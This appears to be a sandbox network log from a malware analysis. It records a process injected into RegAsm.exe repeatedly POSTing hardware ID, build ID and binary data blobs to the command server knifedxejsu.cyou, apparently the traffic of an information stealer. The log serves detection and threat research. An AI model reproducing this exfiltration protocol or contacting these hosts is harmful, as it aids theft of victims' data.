2024-11-07 16:55:20 UTC	553	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-07 16:55:20 UTC	957	IN	HTTP/1.1 200 OK Version: 691321546 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 07 Nov 2024 16:55:20 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 16:55:20 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-07 16:55:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49720	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:21 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U3PWMHQNRFFR3RVVVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 767 Host: knifedxejsu.cyou
2024-11-07 16:55:21 UTC	767	OUT	Data Raw: 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d Data Ascii: --U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-
2024-11-07 16:55:22 UTC	1008	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r69f6arbuiuvp4p1mcsdi27iln; expires=Mon, 03-Mar-2025 10:42:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTI07B9MqXkiBzIjLyStPLzySdq6fh%2F5X3HZfwdUzfAvAOAoUJwg20%2FQu4vSfybBJhOpeeCMbmIjhRjnxRT9w7KHIf5r5zM%2FjBpcwC7lu7D4GAyoi06yfTNqm4RRRxQUvwSH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9b87aa64295-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102476&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1694&delivery_rate=37327&cwnd=252&unsent_bytes=0&cid=23c9ac9357466c5c&ts=805&x=0"
2024-11-07 16:55:22 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49724	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:22 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7HSJ6MZNJNF7RVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 21273 Host: knifedxejsu.cyou
2024-11-07 16:55:22 UTC	15331	OUT	Data Raw: 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d Data Ascii: --7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="pid"2--7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="lid"HpOoIh-
2024-11-07 16:55:22 UTC	5942	OUT	Data Raw: d8 0c 28 33 70 29 ab 36 a1 5f 5a 8c ed d0 a6 b9 de a8 ad cc 8e af 6e 56 3d 57 26 a6 6a 69 34 5c a7 1d a8 e3 95 cb c4 89 da 1b ad d2 14 59 55 cf 60 f1 e9 71 51 b5 12 21 17 6b 72 d5 32 74 b5 16 23 63 28 34 d4 0a 8d ad a4 c7 26 d7 37 80 5b f6 42 56 54 15 c3 25 b6 c9 22 a5 89 e9 a4 50 af b0 7c 85 d3 e7 10 c5 56 b7 99 13 8d 9e c6 52 55 6c a5 12 9b a5 58 ff 76 80 b1 be 26 d9 93 69 4d 8a 44 e8 e7 65 57 77 f4 78 cd 4b 81 3e 4a b6 55 91 69 61 d6 64 a5 aa c7 09 ea 8e ac a8 ae be 4b e2 3c 1d 57 b1 a9 06 68 82 d4 9d 78 bd 4b c4 a4 95 46 3d 42 f3 52 89 a6 c6 b3 7b 4b e5 eb af 9c 13 c4 b9 39 be 3e 1b 32 e8 db 65 52 3a d6 f1 9b 31 86 7c bb 4d 51 27 1a f1 4d b0 59 9d e7 b8 cc 78 2a bb 2f 00 5e 14 5c ff 07 00 00 00 d2 07 f6 ff 01 00 00 80 f4 91 63 1f 18 ff 01 00 00 80 54 Data Ascii: (3p)6_ZnV=W&ji4\YU`qQ!kr2t#c(4&7[BVT%"P\|VRUlXv&iMDeWwxK>JUiadK<WhxKF=BR{K9>2eR:1\|MQ'MYx*/^\cT
2024-11-07 16:55:23 UTC	1015	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=glg04p93p49bgadja43vbkfvml; expires=Mon, 03-Mar-2025 10:42:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gg0KQgbN2wtobttnP4VvBdJ66LieAjFKs6EpYiJnumNk%2FBTWXHDk%2BhyFr1kkKxI87x0m5N0FldlfYqm1WDs%2Bs6VyUOz0DPxtBswbk%2F530Kb9IRblOEroLR9%2FHqsgrgl6rai9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9be4cdf7c9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102640&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=22237&delivery_rate=37347&cwnd=249&unsent_bytes=0&cid=6b4cc454af5b601d&ts=518&x=0"
2024-11-07 16:55:23 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49725	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:23 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=003ECS8VBNZVNRVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 10994 Host: knifedxejsu.cyou
2024-11-07 16:55:23 UTC	10994	OUT	Data Raw: 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 Data Ascii: --003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data;
2024-11-07 16:55:24 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=11pq06g1kt0ak6nt282b6ml5j6; expires=Mon, 03-Mar-2025 10:42:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=11HrER19Uc8XqCJLxug2F%2BItzXYyZwju0%2FGmYgFVBYSvMGoZQD52KdphMfDvlQGOlQKY5bADlPhh8YE%2FdIwmrqZPxrYRskza45nwQqCd1wlPrKHuWgCDlOiPu7dmBZu%2FFHID"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9c2fa560f7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102513&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=11943&delivery_rate=37451&cwnd=252&unsent_bytes=0&cid=6a99d2834dc27429&ts=821&x=0"
2024-11-07 16:55:24 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49727	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:24 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=X1Z1QA7ZN7F7RVVVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20629 Host: knifedxejsu.cyou
2024-11-07 16:55:24 UTC	15331	OUT	Data Raw: 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 Data Ascii: --X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-dat
2024-11-07 16:55:24 UTC	5298	OUT	Data Raw: 53 74 3f d3 eb 7e 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 7a a3 c3 f4 ba ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 Data Ascii: St?~DXzMazw\ot^:):Ln`X6Eu
2024-11-07 16:55:25 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ss8ftsnhgul7m5fhbo7a84vlqp; expires=Mon, 03-Mar-2025 10:42:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGDuTCbpaPtm0HgLaEsr1j%2BnY0cEz0SyvSoXHQjLStc3DHMC%2BB06duM1FLUe2jMmAQ7HrkwIYoDZVw0uGH9IGKFdDF65X%2BmFTEBpqtjikXkH3HCN80VdMl5Cf%2FGqG8Jk6oH7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9c9bb8e4225-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102395&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21601&delivery_rate=37303&cwnd=252&unsent_bytes=0&cid=158f86dbfd6bc4df&ts=920&x=0"
2024-11-07 16:55:25 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49728	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:25 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7689064VB37FNRVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1255 Host: knifedxejsu.cyou
2024-11-07 16:55:25 UTC	1255	OUT	Data Raw: 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 0d Data Ascii: --7689064VB37FNRVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--7689064VB37FNRVVVContent-Disposition: form-data; name="pid"1--7689064VB37FNRVVVContent-Disposition: form-data; name="lid"HpOoIh--@topgcr
2024-11-07 16:55:26 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7fafpst44arg4cedr2rtj5v6h5; expires=Mon, 03-Mar-2025 10:42:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62imPcFoFHT7%2BoP2SOjQSfO6gDPOGS69pub64BPaLcTg1vkRuWo4X11dCaAKCREAqnFPC3JWBw%2FClaVANiSjdayuUqQzbLLKWk5h5uAYsNEmdL3dDXRraiqgsXw7hQeoLUmD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9d13b5bc329-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102668&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2171&delivery_rate=37275&cwnd=252&unsent_bytes=0&cid=b1790e75e1610bbe&ts=573&x=0"
2024-11-07 16:55:26 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49729	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:26 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LUQ4FGKV3NFZNRVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1158 Host: knifedxejsu.cyou
2024-11-07 16:55:26 UTC	1158	OUT	Data Raw: 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f Data Ascii: --LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="pid"1--LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="lid"HpOo
2024-11-07 16:55:27 UTC	1009	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ircl7k7ebqm6onf83t33gjcolq; expires=Mon, 03-Mar-2025 10:42:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o23G1FhaXEHSdDTCfMe2RQ1F%2Bii3g9hSVbB0BUKjwryzuKC8DpyPRR0AYlqC%2FheNqodLqxjAk7wm%2FtMnlR1cFloudhbE8qBXfEfK3ULlFgbiTdelSt5LZg25VqfKa0fjdV8u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed9d6cbb443a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102316&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2078&delivery_rate=37413&cwnd=252&unsent_bytes=0&cid=0d9d08dcc8bcf24f&ts=1468&x=0"
2024-11-07 16:55:27 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a Data Ascii: 11ok 156.146.36.208
2024-11-07 16:55:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49730	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:28 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 116 Host: knifedxejsu.cyou
2024-11-07 16:55:28 UTC	116	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@topgcr&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=61C11A71B129FD4CDB71E32F12885CB3
